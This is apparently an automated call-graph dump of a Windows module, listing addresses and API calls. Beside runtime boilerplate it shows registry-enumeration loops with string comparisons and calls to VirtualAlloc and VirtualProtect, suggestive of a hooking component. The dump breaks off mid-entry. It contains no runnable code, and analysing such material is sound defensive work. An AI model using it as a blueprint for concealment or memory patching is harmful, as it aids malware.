SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 6823->6825 6824->6822 6824->6823 7588 2a661309210 7590 2a661309240 _IsNonwritableInCurrentImage __C_specific_handler __except_validate_context_record 7588->7590 7589 2a661309331 7590->7589 7591 2a6613092fc RtlUnwindEx 7590->7591 7591->7590 7592 2a661302c10 7593 2a661302c81 7592->7593 7594 2a661302e87 7593->7594 7595 2a661302cb1 GetModuleHandleA 7593->7595 7596 2a661302cc3 GetProcAddress 7595->7596 7597 2a661302cd5 7595->7597 7596->7597 7597->7594 7598 2a661302cfc StrCmpNIW 7597->7598 7598->7594 7601 2a661302d21 7598->7601 7599 2a661301934 6 API calls 7599->7601 7600 2a661302e34 lstrlenW 7600->7601 7601->7594 7601->7599 7601->7600 7602 2a661301bf4 2 API calls 7601->7602 7603 2a661303c70 StrCmpNIW 7601->7603 7602->7601 7603->7601 6826 2a66130e710 6829 2a66130e694 6826->6829 6836 2a66130aebc EnterCriticalSection 6829->6836 7397 2a66130eb90 7398 2a66130ebbd 7397->7398 7399 2a66130b960 _set_errno_from_matherr 13 API calls 7398->7399 7404 2a66130ebd2 7398->7404 7400 2a66130ebc7 7399->7400 7401 2a66130b840 _invalid_parameter_noinfo 30 API calls 7400->7401 7401->7404 7402 2a661307d60 _handle_error 8 API calls 7403 2a66130ef1f 7402->7403 7404->7402 7405 2a66130b590 7412 2a66130d650 7405->7412 7413 2a66130d3ec try_get_function 5 API calls 7412->7413 7414 2a66130d678 TlsAlloc 7413->7414 7416 2a661308376 7419 2a661309538 7416->7419 7418 2a6613083a1 7420 2a66130958e __std_exception_destroy 7419->7420 7421 2a661309559 7419->7421 7420->7418 7421->7420 7423 2a66130ac54 7421->7423 7424 2a66130ac6b 7423->7424 7425 2a66130ac61 7423->7425 7426 2a66130b960 _set_errno_from_matherr 13 API calls 7424->7426 7425->7424 7430 2a66130ac86 7425->7430 7427 2a66130ac72 7426->7427 7428 2a66130b840 _invalid_parameter_noinfo 30 API calls 7427->7428 7429 2a66130ac7e 7428->7429 7429->7420 7430->7429 7431 2a66130b960 _set_errno_from_matherr 13 API calls 7430->7431 7431->7427 7966 2a66130f478 7967 2a66130f480 7966->7967 7968 2a66130f495 7967->7968 7969 2a66130f4ae 7967->7969 7970 2a66130b960 _set_errno_from_matherr 13 API calls 7968->7970 7972 2a66130ad0c 33 API calls 7969->7972 7974 2a66130f4a5 7969->7974 7971 2a66130f49a 7970->7971 7973 2a66130b840 _invalid_parameter_noinfo 30 API calls 7971->7973 7972->7974 7973->7974 6846 2a661307efc 6853 2a661309470 6846->6853 6852 2a661307f09 6862 2a661309798 6853->6862 6856 2a66130abb4 6887 2a66130b4c4 GetLastError 6856->6887 6858 2a661307f12 6858->6852 6859 2a661309484 6858->6859 6971 2a66130972c 6859->6971 6861 2a66130948f 6861->6852 6863 2a6613097b7 GetLastError 6862->6863 6864 2a661307f05 6862->6864 6874 2a661309b10 6863->6874 6864->6852 6864->6856 6878 2a661309930 6874->6878 6879 2a661309a4a TlsGetValue 6878->6879 6884 2a661309974 try_get_function 6878->6884 6880 2a6613099a2 LoadLibraryExW 6882 2a661309a19 6880->6882 6883 2a6613099c3 GetLastError 6880->6883 6881 2a661309a39 GetProcAddress 6881->6879 6882->6881 6885 2a661309a30 FreeLibrary 6882->6885 6883->6884 6884->6879 6884->6880 6884->6881 6886 2a6613099e5 LoadLibraryExW 6884->6886 6885->6881 6886->6882 6886->6884 6888 2a66130b4e6 6887->6888 6889 2a66130b4eb 6887->6889 6910 2a66130d6e0 6888->6910 6893 2a66130b4f3 SetLastError 6889->6893 6914 2a66130d728 6889->6914 6893->6858 6897 2a66130b53f 6899 2a66130d728 _set_errno_from_matherr 6 API calls 6897->6899 6898 2a66130b52f 6900 2a66130d728 _set_errno_from_matherr 6 API calls 6898->6900 6901 2a66130b547 6899->6901 6902 2a66130b536 6900->6902 6903 2a66130b54b 6901->6903 6904 2a66130b55d 6901->6904 6926 2a66130b9f8 6902->6926 6905 2a66130d728 _set_errno_from_matherr 6 API calls 6903->6905 6931 2a66130b0b4 6904->6931 6905->6902 6936 2a66130d3ec 6910->6936 6915 2a66130d3ec try_get_function 5 API calls 6914->6915 6916 2a66130d756 6915->6916 6917 2a66130d768 TlsSetValue 6916->6917 6918 2a66130b50e 6916->6918 6917->6918 6918->6893 6919 2a66130b980 6918->6919 6925 2a66130b991 _set_errno_from_matherr 6919->6925 6920 2a66130b9e2 6948 2a66130b960 6920->6948 6921 2a66130b9c6 HeapAlloc 6923 2a66130b521 6921->6923 6921->6925 6923->6897 6923->6898 6925->6920 6925->6921 6945 2a661309e44 6925->6945 6927 2a66130b9fd HeapFree 6926->6927 6928 2a66130ba2f 6926->6928 6927->6928 6929 2a66130ba18 6927->6929 6928->6893 6930 2a66130b960 _set_errno_from_matherr 12 API calls 6929->6930 6930->6928 6957 2a66130af8c 6931->6957 6937 2a66130d44d TlsGetValue 6936->6937 6943 2a66130d448 try_get_function 6936->6943 6938 2a66130d530 6938->6937 6941 2a66130d53e GetProcAddress 6938->6941 6939 2a66130d47c LoadLibraryExW 6940 2a66130d49d GetLastError 6939->6940 6939->6943 6940->6943 6941->6937 6942 2a66130d515 FreeLibrary 6942->6943 6943->6937 6943->6938 6943->6939 6943->6942 6944 2a66130d4d7 LoadLibraryExW 6943->6944 6944->6943 6951 2a661309e74 6945->6951 6949 2a66130b4c4 _set_errno_from_matherr 13 API calls 6948->6949 6950 2a66130b969 6949->6950 6950->6923 6956 2a66130aebc EnterCriticalSection 6951->6956 6969 2a66130aebc EnterCriticalSection 6957->6969 6972 2a661309740 6971->6972 6976 2a66130975a __std_exception_destroy 6971->6976 6973 2a66130974a 6972->6973 6974 2a661309b10 __vcrt_freeptd 6 API calls 6972->6974 6977 2a661309b58 6973->6977 6974->6973 6976->6861 6978 2a661309930 __vcrt_FlsAlloc 5 API calls 6977->6978 6979 2a661309b86 6978->6979 6980 2a661309b98 TlsSetValue 6979->6980 6981 2a661309b90 6979->6981 6980->6981 6981->6976 7975 2a66130e47c 7976 2a66130e4a4 7975->7976 7982 2a66130e4b2 7975->7982 7977 2a66130ad0c 33 API calls 7976->7977 7976->7982 7978 2a66130e4d0 7977->7978 7979 2a66130e4de 7978->7979 7980 2a66130e500 7978->7980 7991 2a661310e04 7979->7991 7980->7982 7994 2a661310db8 7980->7994 7985 2a66130e596 7987 2a66130d144 MultiByteToWideChar 7985->7987 7986 2a66130e544 7989 2a66130d144 MultiByteToWideChar 7986->7989 7990 2a66130e579 7986->7990 7987->7990 7988 2a66130b960 _set_errno_from_matherr 13 API calls 7988->7982 7989->7990 7990->7982 7990->7988 7997 2a6613114c4 7991->7997 7995 2a66130ad0c 33 API calls 7994->7995 7996 2a66130e540 7995->7996 7996->7985 7996->7986 7999 2a661311521 7997->7999 8002 2a66131152d 7997->8002 7998 2a661307d60 _handle_error 8 API calls 8001 2a661310e17 7998->8001 7999->7998 8000 2a66130b960 _set_errno_from_matherr 13 API calls 8000->7999 8001->7982 8002->7999 8002->8000 7604 2a661304000 7607 2a661303f4d _invalid_parameter_noinfo 7604->7607 7605 2a661303fb7 7606 2a661303f9d VirtualQuery 7606->7605 7606->7607 7607->7605 7607->7606 7608 2a661304002 GetLastError 7607->7608 7608->7605 7608->7607 6982 2a66130ab04 6983 2a66130ab35 6982->6983 6984 2a66130ab1d 6982->6984 6984->6983 6985 2a66130b9f8 __free_lconv_num 13 API calls 6984->6985 6985->6983 7432 2a661302b84 7434 2a661302be1 7432->7434 7433 2a661302bfc 7434->7433 7435 2a6613034ac 3 API calls 7434->7435 7435->7433 7436 2a66130b184 7437 2a66130b189 7436->7437 7438 2a66130b19e 7436->7438 7442 2a66130b1a4 7437->7442 7443 2a66130b1e6 7442->7443 7446 2a66130b1ee 7442->7446 7444 2a66130b9f8 __free_lconv_num 13 API calls 7443->7444 7444->7446 7445 2a66130b9f8 __free_lconv_num 13 API calls 7447 2a66130b1fb 7445->7447 7446->7445 7448 2a66130b9f8 __free_lconv_num 13 API calls 7447->7448 7449 2a66130b208 7448->7449 7450 2a66130b9f8 __free_lconv_num 13 API calls 7449->7450 7451 2a66130b215 7450->7451 7452 2a66130b9f8 __free_lconv_num 13 API calls 7451->7452 7453 2a66130b222 7452->7453 7454 2a66130b9f8 __free_lconv_num 13 API calls 7453->7454 7455 2a66130b22f 7454->7455 7456 2a66130b9f8 __free_lconv_num 13 API calls 7455->7456 7457 2a66130b23c 7456->7457 7458 2a66130b9f8 __free_lconv_num 13 API calls 7457->7458 7459 2a66130b249 7458->7459 7460 2a66130b9f8 __free_lconv_num 13 API calls 7459->7460 7461 2a66130b259 7460->7461 7462 2a66130b9f8 __free_lconv_num 13 API calls 7461->7462 7463 2a66130b269 7462->7463 7468 2a66130b054 7463->7468 7482 2a66130aebc EnterCriticalSection 7468->7482 7484 2a66130d984 GetProcessHeap 7609 2a66130f004 7610 2a66130f023 7609->7610 7611 2a66130f09c 7610->7611 7614 2a66130f033 7610->7614 7617 2a661308620 7611->7617 7615 2a661307d60 _handle_error 8 API calls 7614->7615 7616 2a66130f092 7615->7616 7620 2a661308634 IsProcessorFeaturePresent 7617->7620 7621 2a66130864b 7620->7621 7626 2a6613086d0 RtlCaptureContext RtlLookupFunctionEntry 7621->7626 7627 2a661308700 RtlVirtualUnwind 7626->7627 7628 2a66130865f 7626->7628 7627->7628 7629 2a661308518 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 7628->7629 6986 2a6613028e8 6988 2a66130292d 6986->6988 6987 2a661302990 6988->6987 6990 2a661303c70 6988->6990 6991 2a661303c7d StrCmpNIW 6990->6991 6992 2a661303c92 6990->6992 6991->6992 6992->6988 6993 2a66130e2e8 6994 2a66130e312 6993->6994 6995 2a66130b980 _set_errno_from_matherr 13 API calls 6994->6995 6996 2a66130e331 6995->6996 6997 2a66130b9f8 __free_lconv_num 13 API calls 6996->6997 6998 2a66130e33f 6997->6998 6999 2a66130b980 _set_errno_from_matherr 13 API calls 6998->6999 7003 2a66130e369 6998->7003 7000 2a66130e35b 6999->7000 7002 2a66130b9f8 __free_lconv_num 13 API calls 7000->7002 7002->7003 7004 2a66130e372 7003->7004 7005 2a66130d77c 7003->7005 7006 2a66130d3ec try_get_function 5 API calls 7005->7006 7007 2a66130d7b2 7006->7007 7008 2a66130d7c7 InitializeCriticalSectionAndSpinCount 7007->7008 7009 2a66130d7bc 7007->7009 7008->7009 7009->7003 7485 2a66130596d 7487 2a661305974 7485->7487 7486 2a6613059db 7487->7486 7488 2a661305a57 VirtualProtect 7487->7488 7489 2a661305a83 GetLastError 7488->7489 7490 2a661305a91 7488->7490 7489->7490 8003 2a661302a74 8004 2a661302ac8 8003->8004 8005 2a661302ae3 8004->8005 8007 2a6613033f8 8004->8007 8008 2a66130341d 8007->8008 8009 2a661303490 8007->8009 8008->8009 8010 2a661303c70 StrCmpNIW 8008->8010 8011 2a661301d08 StrCmpIW StrCmpW 8008->8011 8009->8005 8010->8008 8011->8008 8012 2a66130ae74 8015 2a66130ae7c 8012->8015 8013 2a66130d77c 6 API calls 8013->8015 8014 2a66130aead 8018 2a66130aed8 8014->8018 8015->8013 8015->8014 8016 2a66130aea9 8015->8016 8019 2a66130af03 8018->8019 8020 2a66130af07 8019->8020 8021 2a66130aee6 DeleteCriticalSection 8019->8021 8020->8016 8021->8019 8022 2a661303ed9 8023 2a661303e26 _invalid_parameter_noinfo 8022->8023 8024 2a661303e76 VirtualQuery 8023->8024 8025 2a661303eaa VirtualAlloc 8023->8025 8027 2a661303e90 8023->8027 8024->8023 8024->8027 8026 2a661303edb GetLastError 8025->8026 8025->8027 8026->8023 8026->8027 8028 2a661305cd9 8029 2a661305ce0 VirtualProtect 8028->8029 8030 2a661305d09 GetLastError 8029->8030 8031 2a661305bf0 8029->8031 8030->8031 7630 2a661312a61 __scrt_dllmain_exception_filter 7491 2a66130dbe4 7492 2a66130dbf0 7491->7492 7493 2a66130dc17 7492->7493 7495 2a66130fc7c 7492->7495 7496 2a66130fcbc 7495->7496 7497 2a66130fc81 7495->7497 7496->7492 7498 2a66130fca2 DeleteCriticalSection 7497->7498 7499 2a66130fcb4 7497->7499 7498->7498 7498->7499 7500 2a66130b9f8 __free_lconv_num 13 API calls 7499->7500 7500->7496 6655 2a661301ac8 6662 2a661301628 GetProcessHeap HeapAlloc 6655->6662 6657 2a661301ad7 6658 2a661301ade SleepEx 6657->6658 6661 2a661301598 StrCmpIW StrCmpW 6657->6661 6713 2a6613018b4 6657->6713 6659 2a661301628 50 API calls 6658->6659 6659->6657 6661->6657 6730 2a661301268 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 6662->6730 6664 2a661301650 6731 2a661301000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 6664->6731 6666 2a661301658 6732 2a661301268 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 6666->6732 6668 2a661301661 6733 2a661301268 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 6668->6733 6670 2a66130166a 6734 2a661301268 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 6670->6734 6672 2a661301673 6735 2a661301000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 6672->6735 6674 2a66130167c 6736 2a661301000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 6674->6736 6676 2a661301685 6737 2a661301000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 6676->6737 6678 2a66130168e RegOpenKeyExW 6679 2a6613018a6 6678->6679 6680 2a6613016c0 RegOpenKeyExW 6678->6680 6679->6657 6681 2a6613016e9 6680->6681 6682 2a6613016ff RegOpenKeyExW 6680->6682 6738 2a6613012bc RegQueryInfoKeyW 6681->6738 6684 2a66130173a RegOpenKeyExW 6682->6684 6685 2a661301723 6682->6685 6688 2a66130175e 6684->6688 6689 2a661301775 RegOpenKeyExW 6684->6689 6747 2a66130104c RegQueryInfoKeyW 6685->6747 6690 2a6613012bc 16 API calls 6688->6690 6691 2a661301799 6689->6691 6692 2a6613017b0 RegOpenKeyExW 6689->6692 6694 2a66130176b RegCloseKey 6690->6694 6695 2a6613012bc 16 API calls 6691->6695 6696 2a6613017eb RegOpenKeyExW 6692->6696 6697 2a6613017d4 6692->6697 6694->6689 6698 2a6613017a6 RegCloseKey 6695->6698 6700 2a661301826 RegOpenKeyExW 6696->6700 6701 2a66130180f 6696->6701 6699 2a6613012bc 16 API calls 6697->6699 6698->6692 6702 2a6613017e1 RegCloseKey 6699->6702 6704 2a66130184a 6700->6704 6705 2a661301861 RegOpenKeyExW 6700->6705 6703 2a66130104c 6 API calls 6701->6703 6702->6696 6709 2a66130181c RegCloseKey 6703->6709 6706 2a66130104c 6 API calls 6704->6706 6707 2a66130189c RegCloseKey 6705->6707 6708 2a661301885 6705->6708 6710 2a661301857 RegCloseKey 6706->6710 6707->6679 6711 2a66130104c 6 API calls 6708->6711 6709->6700 6710->6705 6712 2a661301892 RegCloseKey 6711->6712 6712->6707 6757 2a6613014a4 6713->6757 6730->6664 6731->6666 6732->6668 6733->6670 6734->6672 6735->6674 6736->6676 6737->6678 6739 2a661301327 GetProcessHeap HeapAlloc 6738->6739 6740 2a66130148a RegCloseKey 6738->6740 6741 2a661301476 GetProcessHeap HeapFree 6739->6741 6742 2a661301352 RegEnumValueW 6739->6742 6740->6682 6741->6740 6743 2a6613013a5 6742->6743 6743->6741 6743->6742 6745 2a66130141e lstrlenW GetProcessHeap HeapAlloc StrCpyW 6743->6745 6746 2a6613013d3 GetProcessHeap HeapAlloc GetProcessHeap HeapFree 6743->6746 6752 2a66130152c 6743->6752 6745->6743 6746->6745 6748 2a6613011b7 RegCloseKey 6747->6748 6750 2a6613010bf 6747->6750 6748->6684 6749 2a6613010cf RegEnumValueW 6749->6750 6750->6748 6750->6749 6751 2a661301150 GetProcessHeap HeapAlloc GetProcessHeap HeapFree 6750->6751 6751->6750 6753 2a661301546 6752->6753 6756 2a66130157c 6752->6756 6754 2a66130155d StrCmpIW 6753->6754 6755 2a661301565 StrCmpW 6753->6755 6753->6756 6754->6753 6755->6753 6756->6743 6758 2a6613014e1 GetProcessHeap HeapFree GetProcessHeap HeapFree 6757->6758 6759 2a6613014c1 GetProcessHeap HeapFree 6757->6759 6759->6758 6759->6759 7631 2a661309448 7638 2a6613098c4 7631->7638 7634 2a661309455 7654 2a661309bac 7638->7654 7641 2a661309451 7641->7634 7643 2a661309858 7641->7643 7642 2a6613098f8 __vcrt_uninitialize_locks DeleteCriticalSection 7642->7641 7659 2a661309a80 7643->7659 7655 2a661309930 __vcrt_FlsAlloc 5 API calls 7654->7655 7656 2a661309be2 7655->7656 7657 2a661309bf7 InitializeCriticalSectionAndSpinCount 7656->7657 7658 2a6613098dc 7656->7658 7657->7658 7658->7641 7658->7642 7660 2a661309930 __vcrt_FlsAlloc 5 API calls 7659->7660 7661 2a661309aa5 TlsAlloc 7660->7661 7010 2a66130a150 7011 2a66130a1b7 7010->7011 7012 2a66130a16d GetModuleHandleW 7010->7012 7025 2a66130a048 7011->7025 7012->7011 7018 2a66130a17a 7012->7018 7018->7011 7020 2a66130a258 GetModuleHandleExW 7018->7020 7021 2a66130a295 7020->7021 7022 2a66130a27e GetProcAddress 7020->7022 7023 2a66130a2a7 FreeLibrary 7021->7023 7024 2a66130a2ad 7021->7024 7022->7021 7023->7024 7024->7011 7039 2a66130aebc EnterCriticalSection 7025->7039 7663 2a661307c50 7664 2a661307c6c 7663->7664 7665 2a661307c71 7663->7665 7667 2a661307d80 7664->7667 7668 2a661307e17 7667->7668 7669 2a661307da3 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 7667->7669 7668->7665 7669->7668 7047 2a66130bd50 7048 2a66130bd76 7047->7048 7057 2a66130bd8c 7047->7057 7049 2a66130b960 _set_errno_from_matherr 13 API calls 7048->7049 7051 2a66130bd7b 7049->7051 7050 2a66130bdf9 7093 2a66130a4a0 7050->7093 7068 2a66130b840 7051->7068 7054 2a66130bd85 7055 2a66130bee1 7058 2a66130b9f8 __free_lconv_num 13 API calls 7055->7058 7057->7050 7063 2a66130bdec 7057->7063 7071 2a66130bf5c 7057->7071 7058->7063 7059 2a66130be6c 7059->7055 7065 2a66130bf44 7059->7065 7099 2a66130ef30 7059->7099 7060 2a66130bf22 7062 2a66130b9f8 __free_lconv_num 13 API calls 7060->7062 7061 2a66130b9f8 __free_lconv_num 13 API calls 7061->7063 7062->7054 7063->7060 7063->7061 7108 2a66130b860 IsProcessorFeaturePresent 7065->7108 7112 2a66130b790 7068->7112 7070 2a66130b859 7070->7054 7072 2a66130bf8a 7071->7072 7072->7072 7073 2a66130b980 _set_errno_from_matherr 13 API calls 7072->7073 7074 2a66130bfd5 7073->7074 7075 2a66130ef30 30 API calls 7074->7075 7076 2a66130c00b 7075->7076 7077 2a66130b860 _invalid_parameter_noinfo 17 API calls 7076->7077 7078 2a66130c0e2 7077->7078 7120 2a66130ad0c 7078->7120 7085 2a66130c270 7086 2a66130ad0c 33 API calls 7085->7086 7087 2a66130c2a3 7086->7087 7088 2a66130d614 5 API calls 7087->7088 7089 2a66130c2cb 7088->7089 7153 2a66130bbc4 7089->7153 7092 2a66130bf5c 38 API calls 7094 2a66130a4b8 7093->7094 7095 2a66130a4f0 7093->7095 7094->7095 7096 2a66130b980 _set_errno_from_matherr 13 API calls 7094->7096 7095->7059 7097 2a66130a4e6 7096->7097 7098 2a66130b9f8 __free_lconv_num 13 API calls 7097->7098 7098->7095 7104 2a66130ef48 7099->7104 7100 2a66130ef4d 7101 2a66130ef63 7100->7101 7102 2a66130b960 _set_errno_from_matherr 13 API calls 7100->7102 7101->7059 7103 2a66130ef57 7102->7103 7105 2a66130b840 _invalid_parameter_noinfo 30 API calls 7103->7105 7104->7100 7104->7101 7106 2a66130ef92 7104->7106 7105->7101 7106->7101 7107 2a66130b960 _set_errno_from_matherr 13 API calls 7106->7107 7107->7103 7109 2a66130b873 7108->7109 7110 2a66130b62c _invalid_parameter_noinfo 14 API calls 7109->7110 7111 2a66130b88e GetCurrentProcess TerminateProcess 7110->7111 7113 2a66130b4c4 _set_errno_from_matherr 13 API calls 7112->7113 7114 2a66130b7b5 7113->7114 7115 2a66130b7c6 7114->7115 7116 2a66130b860 _invalid_parameter_noinfo 17 API calls 7114->7116 7115->7070 7117 2a66130b83d 7116->7117 7118 2a66130b790 _invalid_parameter_noinfo 30 API calls 7117->7118 7119 2a66130b859 7118->7119 7119->7070 7121 2a66130ad2b 7120->7121 7122 2a66130ad30 7120->7122 7128 2a66130d614 7121->7128 7122->7121 7175 2a66130b348 GetLastError 7122->7175 7129 2a66130d3ec try_get_function 5 API calls 7128->7129 7130 2a66130c1ed 7129->7130 7131 2a66130ba4c 7130->7131 7132 2a66130ba97 7131->7132 7133 2a66130ba75 7131->7133 7134 2a66130ba9b 7132->7134 7135 2a66130baf0 7132->7135 7136 2a66130b9f8 __free_lconv_num 13 API calls 7133->7136 7144 2a66130ba83 FindFirstFileExW 7133->7144 7138 2a66130baaf 7134->7138 7140 2a66130b9f8 __free_lconv_num 13 API calls 7134->7140 7134->7144 7308 2a66130d144 7135->7308 7136->7144 7301 2a66130af2c 7138->7301 7140->7138 7144->7085 7154 2a66130bbed 7153->7154 7155 2a66130bc0f 7153->7155 7159 2a66130b9f8 __free_lconv_num 13 API calls 7154->7159 7174 2a66130bbfb 7154->7174 7156 2a66130bc68 7155->7156 7157 2a66130bc14 7155->7157 7311 2a66130d1a0 7156->7311 7162 2a66130b9f8 __free_lconv_num 13 API calls 7157->7162 7166 2a66130bc28 7157->7166 7157->7174 7159->7174 7162->7166 7163 2a66130af2c 14 API calls 7163->7174 7166->7163 7174->7092 7176 2a66130b36f 7175->7176 7177 2a66130b36a 7175->7177 7178 2a66130d728 _set_errno_from_matherr 6 API calls 7176->7178 7181 2a66130b377 SetLastError 7176->7181 7179 2a66130d6e0 _set_errno_from_matherr 6 API calls 7177->7179 7180 2a66130b392 7178->7180 7179->7176 7180->7181 7183 2a66130b980 _set_errno_from_matherr 13 API calls 7180->7183 7185 2a66130b416 7181->7185 7186 2a66130ad4b 7181->7186 7184 2a66130b3a5 7183->7184 7187 2a66130b3c3 7184->7187 7188 2a66130b3b3 7184->7188 7233 2a66130acb4 7185->7233 7225 2a66130e604 7186->7225 7192 2a66130d728 _set_errno_from_matherr 6 API calls 7187->7192 7190 2a66130d728 _set_errno_from_matherr 6 API calls 7188->7190 7202 2a66130b3ba 7190->7202 7193 2a66130b3cb 7192->7193 7194 2a66130b3cf 7193->7194 7195 2a66130b3e1 7193->7195 7197 2a66130d728 _set_errno_from_matherr 6 API calls 7194->7197 7198 2a66130b0b4 _set_errno_from_matherr 13 API calls 7195->7198 7197->7202 7203 2a66130b3e9 7198->7203 7200 2a66130b9f8 __free_lconv_num 13 API calls 7200->7181 7202->7200 7206 2a66130b9f8 __free_lconv_num 13 API calls 7203->7206 7206->7181 7226 2a66130e619 7225->7226 7228 2a66130ad6e 7225->7228 7226->7228 7285 2a66130eaac 7226->7285 7229 2a66130e638 7228->7229 7230 2a66130e64d 7229->7230 7231 2a66130e660 7229->7231 7230->7231 7298 2a66130cdb8 7230->7298 7231->7121 7242 2a66130dd28 7233->7242 7276 2a66130dce0 7242->7276 7281 2a66130aebc EnterCriticalSection 7276->7281 7286 2a66130b348 33 API calls 7285->7286 7287 2a66130eabb 7286->7287 7288 2a66130eb06 7287->7288 7297 2a66130aebc EnterCriticalSection 7287->7297 7288->7228 7299 2a66130b348 33 API calls 7298->7299 7300 2a66130cdc1 7299->7300 7302 2a66130af77 7301->7302 7306 2a66130af3b _set_errno_from_matherr 7301->7306 7304 2a66130b960 _set_errno_from_matherr 13 API calls 7302->7304 7303 2a66130af5e HeapAlloc 7305 2a66130af75 7303->7305 7303->7306 7304->7305 7305->7144 7306->7302 7306->7303 7307 2a661309e44 _set_errno_from_matherr 2 API calls 7306->7307 7307->7306 7309 2a66130d14c MultiByteToWideChar 7308->7309 7313 2a66130d1c3 WideCharToMultiByte 7311->7313 7501 2a6613083d4 7502 2a661309538 __std_exception_copy 30 API calls 7501->7502 7503 2a6613083fd 7502->7503 7670 2a661305654 7671 2a66130565a 7670->7671 7682 2a661307c90 7671->7682 7674 2a6613056be 7676 2a661305757 _invalid_parameter_noinfo 7676->7674 7679 2a6613058dd 7676->7679 7695 2a661307860 7676->7695 7678 2a6613059db 7679->7678 7680 2a661305a57 VirtualProtect 7679->7680 7680->7674 7681 2a661305a83 GetLastError 7680->7681 7681->7674 7683 2a661307c9b 7682->7683 7684 2a66130569d 7683->7684 7685 2a661309e44 _set_errno_from_matherr 2 API calls 7683->7685 7686 2a661307cba 7683->7686 7684->7674 7691 2a6613040e0 7684->7691 7685->7683 7687 2a661307cc5 7686->7687 7701 2a6613084bc 7686->7701 7705 2a6613084dc 7687->7705 7692 2a6613040fd 7691->7692 7694 2a66130416c _invalid_parameter_noinfo 7692->7694 7714 2a661304350 7692->7714 7694->7676 7696 2a6613078a7 7695->7696 7739 2a661307630 7696->7739 7699 2a661307d60 _handle_error 8 API calls 7700 2a6613078d1 7699->7700 7700->7676 7702 2a6613084ca std::bad_alloc::bad_alloc 7701->7702 7709 2a6613095f0 7702->7709 7704 2a6613084db 7706 2a6613084ea std::bad_alloc::bad_alloc 7705->7706 7707 2a6613095f0 Concurrency::cancel_current_task 2 API calls 7706->7707 7708 2a661307ccb 7707->7708 7710 2a66130962c RtlPcToFileHeader 7709->7710 7711 2a66130960f 7709->7711 7712 2a661309653 RaiseException 7710->7712 7713 2a661309644 7710->7713 7711->7710 7712->7704 7713->7712 7715 2a661304397 7714->7715 7716 2a661304374 7714->7716 7717 2a6613043cd 7715->7717 7734 2a661303f30 7715->7734 7716->7715 7728 2a661303e00 7716->7728 7720 2a6613043fd 7717->7720 7721 2a661303f30 2 API calls 7717->7721 7722 2a661303e00 3 API calls 7720->7722 7726 2a661304433 7720->7726 7721->7720 7722->7726 7723 2a661303e00 3 API calls 7724 2a66130444f 7723->7724 7725 2a66130446b 7724->7725 7727 2a661303f30 2 API calls 7724->7727 7725->7694 7726->7723 7726->7724 7727->7725 7731 2a661303e21 _invalid_parameter_noinfo 7728->7731 7729 2a661303e90 7729->7715 7730 2a661303e76 VirtualQuery 7730->7729 7730->7731 7731->7729 7731->7730 7732 2a661303eaa VirtualAlloc 7731->7732 7732->7729 7733 2a661303edb GetLastError 7732->7733 7733->7729 7733->7731 7735 2a661303f48 _invalid_parameter_noinfo 7734->7735 7736 2a661303f9d VirtualQuery 7735->7736 7737 2a661303fb7 7735->7737 7738 2a661304002 GetLastError 7735->7738 7736->7735 7736->7737 7737->7717 7738->7735 7738->7737 7740 2a66130764b 7739->7740 7741 2a661307661 SetLastError 7740->7741 7742 2a66130766f 7740->7742 7741->7742 7742->7699 7314 2a66130d354 7315 2a66130d376 7314->7315 7316 2a66130d393 7314->7316 7315->7316 7317 2a66130d384 7315->7317 7318 2a66130d39d 7316->7318 7323 2a66130fa6c 7316->7323 7319 2a66130b960 _set_errno_from_matherr 13 API calls 7317->7319 7330 2a66130faa8 7318->7330 7322 2a66130d389 _invalid_parameter_noinfo 7319->7322 7324 2a66130fa8e HeapSize 7323->7324 7325 2a66130fa75 7323->7325 7326 2a66130b960 _set_errno_from_matherr 13 API calls 7325->7326 7327 2a66130fa7a 7326->7327 7328 2a66130b840 _invalid_parameter_noinfo 30 API calls 7327->7328 7329 2a66130fa85 7328->7329 7329->7318 7331 2a66130fac7 7330->7331 7332 2a66130fabd 7330->7332 7334 2a66130facc 7331->7334 7341 2a66130fad3 _set_errno_from_matherr 7331->7341 7333 2a66130af2c 14 API calls 7332->7333 7339 2a66130fac5 7333->7339 7335 2a66130b9f8 __free_lconv_num 13 API calls 7334->7335 7335->7339 7336 2a66130fb06 HeapReAlloc 7336->7339 7336->7341 7337 2a66130fad9 7338 2a66130b960 _set_errno_from_matherr 13 API calls 7337->7338 7338->7339 7339->7322 7340 2a661309e44 _set_errno_from_matherr 2 API calls 7340->7341 7341->7336 7341->7337 7341->7340 7743 2a66130fa54 7746 2a66130cd58 7743->7746 7747 2a66130cd65 7746->7747 7751 2a66130cdaa 7746->7751 7752 2a66130b41c 7747->7752 7753 2a66130b432 7752->7753 7754 2a66130b42d 7752->7754 7756 2a66130d728 _set_errno_from_matherr 6 API calls 7753->7756 7758 2a66130b43a 7753->7758 7755 2a66130d6e0 _set_errno_from_matherr 6 API calls 7754->7755 7755->7753 7757 2a66130b451 7756->7757 7757->7758 7759 2a66130b980 _set_errno_from_matherr 13 API calls 7757->7759 7760 2a66130acb4 33 API calls 7758->7760 7765 2a66130b4b4 7758->7765 7761 2a66130b464 7759->7761 7762 2a66130b4c2 7760->7762 7763 2a66130b482 7761->7763 7764 2a66130b472 7761->7764 7766 2a66130d728 _set_errno_from_matherr 6 API calls 7763->7766 7767 2a66130d728 _set_errno_from_matherr 6 API calls 7764->7767 7777 2a66130cae0 7765->7777 7768 2a66130b48a 7766->7768 7769 2a66130b479 7767->7769 7770 2a66130b48e 7768->7770 7771 2a66130b4a0 7768->7771 7774 2a66130b9f8 __free_lconv_num 13 API calls 7769->7774 7772 2a66130d728 _set_errno_from_matherr 6 API calls 7770->7772 7773 2a66130b0b4 _set_errno_from_matherr 13 API calls 7771->7773 7772->7769 7775 2a66130b4a8 7773->7775 7774->7758 7776 2a66130b9f8 __free_lconv_num 13 API calls 7775->7776 7776->7758 7795 2a66130cca0 7777->7795 7779 2a66130cb09 7810 2a66130c7ec 7779->7810 7782 2a66130cb23 7782->7751 7783 2a66130af2c 14 API calls 7785 2a66130cb34 7783->7785 7784 